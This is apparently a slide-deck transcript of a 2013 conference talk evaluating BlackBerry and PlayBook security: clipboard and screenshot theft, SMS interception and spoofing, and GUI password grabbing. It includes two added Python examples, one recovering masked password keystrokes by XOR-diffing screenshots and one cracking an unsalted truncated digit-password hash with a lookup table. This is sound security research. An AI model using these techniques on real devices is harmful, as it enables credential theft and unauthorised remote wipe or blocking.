This PDF is a presentation by Yury Chemerkin given at NullCon Goa 2013. It is listed under the title "State-of-Art of Mobile Forensics", but the title slide reads "Security Evaluation or Escaping from 'Vulnerability Prison'". The deck is a security evaluation of BlackBerry smartphones (BB OS 4–7) and the BlackBerry PlayBook tablet: it compares their security environments, classifies rootkits and spyware, and walks through weaknesses in the file system, application management, the clipboard, screenshots, the messaging APIs, device-password handling, GUI automation, third-party security products (Kaspersky and McAfee Mobile Security) and the permission model, with an eye to what an attacker or a forensic examiner can extract from the device.
Size: 2.73 MB
Language: en
Added: Jul 26, 2024
Slides: 28 pages
Slide Content
Security Evaluation or Escaping from "Vulnerability Prison"
Ph.D. Yury Chemerkin
NullCon Goa 2013
BlackBerry security environment
The BlackBerry smartphone was secure... the PlayBook has come with a poor environment
BlackBerry smartphone:
- Security is the cornerstone
- Powerful high-level integration: IMs, social networks, financial data, etc.
- The BlackBerry was built free of malware and harmful actions, with native security solutions
- Mainly focused on the enterprise: a wide IT policy set (up to 500 units)
- A few third-party security solutions
BlackBerry PlayBook:
- A simplification of the security vision
- Poor integration (only BlackBerry Bridge)
- No built-in IMs, HTML5 or web launcher; no wallets or other built-in applications
- The PlayBook may yield little valuable data because of its APIs: it is not more than a large phone screen
- Totally focused on the enterprise: the IT policy set is further reduced (up to 10 units)
- Entertainment applications only
User-mode rootkit and spyware
Malware boundaries become unclear... hackers are interested in cheaper costs
A lot of rootkit types:
- Bootkits
- Firmware
- User-mode
- Kernel
- Hypervisor
Similar to spyware:
- Bundled with desirable software
- Widespread, easy to distribute and quite relevant for hackers
Methods, based on:
- Vendor-supplied extensions
- Third-party plugins
- Public interfaces
- Interception of system messages
- Exploitation of security vulnerabilities
- Hooking and patching of APIs
The file system issues
BB OS 4–5 (was accessible):
- Via the built-in (internal) explorer, after entering the device password
- The internal explorer can still execute malware from the device by clicking a file (.jar/.jad + .cod)
- Allows copying the malware onto the device when it is mounted as an external drive (like a worm)
BB OS 6–7 plus PlayBook (are accessible):
- All data is accessible except app and system data, without any API or other info, after mounting the device as external drive(s)
- After entering the password, but it is not necessary to use the internal explorer
- Prevents executing anything outside App World (.bar)
- Malware is a "personal application" subtype in terms of RIM's security model
- The sandbox protects only app data, while user data is stored in shared folders
The application management issues
BlackBerry smartphone (earlier than BB 10):
- The "upgrade" feature means at least the install and remove actions
- An application ID is required
- The list of running applications is accessible
- Handling other apps silently via the API
- Handling another application silently via PC tools: may need a password; debug mode is for tracing and debugging only
- Easy tracking of newly arriving .cod modules for the malware payload
BlackBerry PlayBook (probably BlackBerry 10 too):
- "Upgrade" means user interaction, with App World or with the home screen
- There are some APIs, but they are disabled; there is no API for such actions yet
- Handling another application silently via PC tools: may need a password; strongly needs debug mode activated
- Looks more secure than the BlackBerry smartphone, but distributed malware is difficult to remove
The clipboard issues
BlackBerry smartphone:
- How to reveal the data in real time: getClipboard()
- Any protection? Native wallets restrict clipboard access by returning "null", but only while the wallet application is active (on top of the screen stack); this does not work in the minimized state
BlackBerry PlayBook:
- How to reveal the data in real time: getData()
- Any protection? There is no native wallet application
- The last clipboard data can be managed via the shared folder: plain text, HTML, etc.
The photoscreen (screenshot) issues
Screenshots are available for all BlackBerry devices, but disabled for PlayBook and BlackBerry 10 as yet
- Screen protection via switching permit/restrict, additionally per application... but it does not handle windows
- Handles the key preview shown by the virtual keyboard; may be improved by XOR'ing two screenshots to get the difference; masking the asterisks takes a delay long enough to steal the text
- May be part of OCR engines, online or desktop, which recognize typed data very quickly; was tested on ABBYY online OCR
- A substitute for a hardware keylogger, running down the battery more slowly than the photo/video camera
- Easy access to any application... even the wallet: no restriction like the clipboard "null"
- Screenshots are often stored in the camera folder, so reading them is the same as file access
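The XOR-difference trick the slide above mentions, as an added example that is not part of the original deck: two successive screen captures of a masked password field are XOR'ed pixel by pixel, the bounding box of the non-zero pixels locates the virtual keyboard's key-preview bubble, and that patch is cropped out for an OCR engine. The frames here are constructed in-memory greyscale bitmaps (lists of rows of 0–255 values); a real attacker would feed captured screenshots. The screen size, field position and bubble position are assumptions made up for the demo.

```python
"""Added example (not from the slides): locate the virtual-keyboard key
preview by XOR-diffing two successive screen captures of a masked field."""
from typing import List, Optional, Tuple

Frame = List[List[int]]           # rows of 8-bit greyscale pixels
Box = Tuple[int, int, int, int]   # x, y, width, height


def blank_frame(width: int, height: int, fill: int = 255) -> Frame:
    return [[fill] * width for _ in range(height)]


def draw_rect(frame: Frame, box: Box, value: int) -> None:
    """Paint a solid rectangle in place (stands in for asterisks, bubble, glyph)."""
    x, y, w, h = box
    for row in frame[y:y + h]:
        row[x:x + w] = [value] * w


def xor_frames(a: Frame, b: Frame) -> Frame:
    """Pixel-wise XOR: unchanged pixels become 0, anything that changed stays non-zero."""
    if len(a) != len(b) or any(len(ra) != len(rb) for ra, rb in zip(a, b)):
        raise ValueError("frames must have identical dimensions")
    return [[pa ^ pb for pa, pb in zip(ra, rb)] for ra, rb in zip(a, b)]


def changed_region(diff: Frame, threshold: int = 0) -> Optional[Box]:
    """Bounding box of pixels whose XOR exceeds threshold; None if nothing changed.
    threshold lets you ignore low-amplitude noise (anti-aliasing, a blinking
    cursor) that would otherwise inflate the box."""
    xs: List[int] = []
    ys: List[int] = []
    for y, row in enumerate(diff):
        for x, v in enumerate(row):
            if v > threshold:
                xs.append(x)
                ys.append(y)
    if not xs:
        return None
    return (min(xs), min(ys), max(xs) - min(xs) + 1, max(ys) - min(ys) + 1)


def crop(frame: Frame, box: Box) -> Frame:
    x, y, w, h = box
    return [row[x:x + w] for row in frame[y:y + h]]


def recover_preview(before: Frame, after: Frame, threshold: int = 0) -> Optional[Frame]:
    """Return the patch of `after` that differs from `before`: the key-preview
    bubble holding the plaintext glyph, ready to be handed to OCR."""
    box = changed_region(xor_frames(before, after), threshold)
    return None if box is None else crop(after, box)


# Constructed scenario (assumed layout): a 64x32 screen, password field on rows 20-25.
# Frame 1: three characters already typed and masked as black asterisk blobs.
FIELD: Box = (4, 20, 56, 6)
before = blank_frame(64, 32)
draw_rect(before, FIELD, 230)                      # light-grey field background
for i in range(3):
    draw_rect(before, (6 + 5 * i, 22, 3, 2), 0)    # masked characters

# Frame 2: the fourth key was just pressed. The keyboard shows a preview bubble
# above the field with the plaintext glyph; the asterisk has not replaced it yet.
after = [row[:] for row in before]
draw_rect(after, (20, 6, 10, 12), 200)             # preview bubble (grey)
draw_rect(after, (23, 9, 4, 6), 0)                 # the glyph inside it (ink)

if __name__ == "__main__":
    print("changed region (x, y, w, h):", changed_region(xor_frames(before, after)))
    for row in recover_preview(before, after):
        print("".join("#" if v < 128 else "." for v in row))
```

The bounding box is deliberately crude: on a real capture you would raise `threshold` to drop cursor blink and anti-aliasing noise, and split the box into connected components if the new asterisk has already been painted in the same frame.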
The messages issues
Available on BB devices; probably on BlackBerry 10; no 3G and no API for the PlayBook
Using the authorized API to intercept messages (BBM, email, PIN-to-PIN):
- Create the message
- Read the message
- Delete the message
- Set the message status (unread, sent, any error state, etc.)
- The button events (the same types): opening, forwarding, sending the message
Intercepting SMS (basic):
- Receiving and sending events
- Deleting the sent and received SMS
- Enough to handle social C&C SMS
Outgoing SMS (advanced):
- Blocking (dropping) the SMS
- A notification in the message thread
- Spoofing the recipient, the body
- "Transmission refused by ..." if such a message was not removed
The device password issues
For BlackBerry 4–7 in the internal case; for all devices in the desktop-access case
- The password protection covers device locking, the encryption feature and the App World request
- Limited to 5/10 attempts and then a wipe; the wipe covers the internal storage only
- Extracting the password through an Elcomsoft product (custom case)
GUI vulnerability:
- Creating a fake window on desktop synchronization
- Breaking into the BlackBerry Desktop software
- Handling the desktop software vulnerability: unmasking the field, grabbing the password, masking the field; the delay takes no more than 15 msec
Affected password types: the device password, the backup password
Affected devices: BlackBerry 4–7 (BB 10 highly probably), BlackBerry PlayBook
The GUI exploitation
A consequence of the wide integration features offered to developers (BlackBerry 4–7 only)
- Initially based on the authorized API covering all physical and navigation buttons and typing textual data; affects all native and third-party apps
- Secondarily based on adding menu items into the global menu and into the "Send via" menu; affects all native applications
- Native applications are developed by RIM: BlackBerry wallets, messages, settings, Facebook, Twitter, ... BBM/GTalk/Yahoo/Windows IMs, ...
GUI exploitation handles:
- Redrawing the screens
- Adding new GUI objects and changing their properties
- Grabbing the text from any field (incl. the password field): the device-unlock field, the set-password field
- Adding and removing field data: the original data is inaccessible but not affected
- GUI object shuffling is not possible
The third-party exploitation
There are a few of them; they might have an exploit but ruin the native security
Kaspersky Mobile Security provides firewall, wipe, block and info features:
- No protection from removing .CODs
- No protection under the simulator (examining the traffic, behaviour); should check the "is simulator" API
- SMS management ("quite" secret SMS): the password is a set of four to sixteen digits ... and can be modified in real time
- The SMS is half of a GOST R 34.11-94 hash value; the implementation uses test crypto values and no salt, so (value → hash) tables are easily built
- Outgoing SMS can be spoofed without any notification
- Outgoing SMS can block or wipe the same device or another device
McAfee Mobile Security provides firewall, wipe, block and info features:
- No protection from removing .CODs
- No protection under the simulator (examining the traffic, behaviour); should check the "is simulator" API
- Web management console: difficult to break the SMS C&C
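Why an unsalted, truncated hash of a short all-digit password is a lookup-table problem, as an added example that is not from the deck or from either vendor's product: every digit string in the chosen length range is hashed once, the tag is mapped back to the password, and a tag sniffed from an outgoing command SMS is then a dictionary lookup. Python's hashlib has no portable GOST R 34.11-94, so SHA-256 stands in; the attack does not depend on the algorithm, only on the hash being deterministic, unsalted and computed over a small input space. The length bounds, the sample password, the salt and the word "tag" are assumptions for the demo.

```python
"""Added example (not from the slides): precompute a (tag -> password) table
for an unsalted, truncated hash of a 4-5 digit password, then show that a
per-device salt makes the same table miss."""
import hashlib
from itertools import product
from typing import Dict, Optional

DIGITS = "0123456789"


def half_hash(password: str) -> bytes:
    """Stand-in for 'half a hash value': the first 16 of 32 digest bytes.
    SHA-256 replaces GOST R 34.11-94 here (assumption, see lead-in)."""
    digest = hashlib.sha256(password.encode("ascii")).digest()
    return digest[: len(digest) // 2]


def salted_half_hash(password: str, salt: bytes) -> bytes:
    """What the slide says is missing: a per-device salt, so a table built
    once cannot be reused against another device."""
    digest = hashlib.sha256(salt + password.encode("ascii")).digest()
    return digest[: len(digest) // 2]


def keyspace(min_len: int, max_len: int) -> int:
    """Number of all-digit passwords with lengths in [min_len, max_len]."""
    return sum(10 ** n for n in range(min_len, max_len + 1))


def build_table(min_len: int, max_len: int) -> Dict[bytes, str]:
    """Enumerate every digit string in the length range and map its tag back to
    the password. Because nothing device-specific enters the hash, this is done
    once, offline, and reused against every device."""
    table: Dict[bytes, str] = {}
    for length in range(min_len, max_len + 1):
        for combo in product(DIGITS, repeat=length):
            password = "".join(combo)
            table.setdefault(half_hash(password), password)
    return table


def recover(tag: bytes, table: Dict[bytes, str]) -> Optional[str]:
    """Given a tag sniffed from a command SMS, look up the password that made it."""
    return table.get(tag)


# 4- and 5-digit passwords only: 110,000 entries, a fraction of a second.
# The full 4-16 digit space (~1.1e16) is not a table, but an attacker only
# needs the lengths people actually pick, and the short end is instant.
TABLE = build_table(4, 5)

if __name__ == "__main__":
    victim_password = "48213"          # assumed; never given to the attacker
    sniffed_tag = half_hash(victim_password)
    print("keyspace for 4-5 digits:", keyspace(4, 5))
    print("recovered from tag:", recover(sniffed_tag, TABLE))
    salted = salted_half_hash(victim_password, b"device-serial-0001")
    print("same password, salted, table lookup:", recover(salted, TABLE))
```

Once the password is recovered the attacker can mint a valid tag for any command, which is the "spoofed outgoing SMS can block or wipe the same or another device" point on the slide; a salt alone does not stop replay of a captured command, so a nonce or counter would also be needed.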
The permissions
Privileged general permissions over own apps, native and 3rd-party apps' features
Denial of service:
- Replacing/removing exec files
- DoS'ing events, noising fields
- GUI intercept
Information disclosure:
- Clipboard, screen capture
- GUI intercept
- Dumping .cod files, shared files
MITM (interception/spoofing):
- Messages
- GUI intercept, third-party apps
- Fake window/clickjacking
BlackBerry smartphone:
- General permissions instead of specific sub-permissions
- A few notification/event logs for the user
- Built per application instead of per app screen
- Concrete permissions, but combined into a general permission: a screenshot permission is part of the camera permission
BlackBerry PlayBook:
- General permissions instead of specific sub-permissions
- A few notification/event logs for the user
- Built per application instead of per app screen
Conclusion
The vendor's security vision has nothing to do with reality, aggravated by simplicity
- Simplification and reduction of security controls
- Many general permissions, combined into each other
- No activity logs for sub-permissions to prove transparency
- Any security vulnerability is only fixed by an entirely new and different OS/kernel
- A few permissions are close to the user's own actions
- The sandbox protects only application data; users have to store their data in shared folders or on external storage
- Applications continue to store data in public folders because that is governed by the chance of availability
- MITM/interception actions are often silent: the native spoofing and interception features
- BlackBerry Enterprise Solution / BlackBerry Mobile Fusion is not very effective
- The best security (permissions) is ruled by Amazon Web Services
- Permissions should rely on a set of different useful cases instead of a specific permission list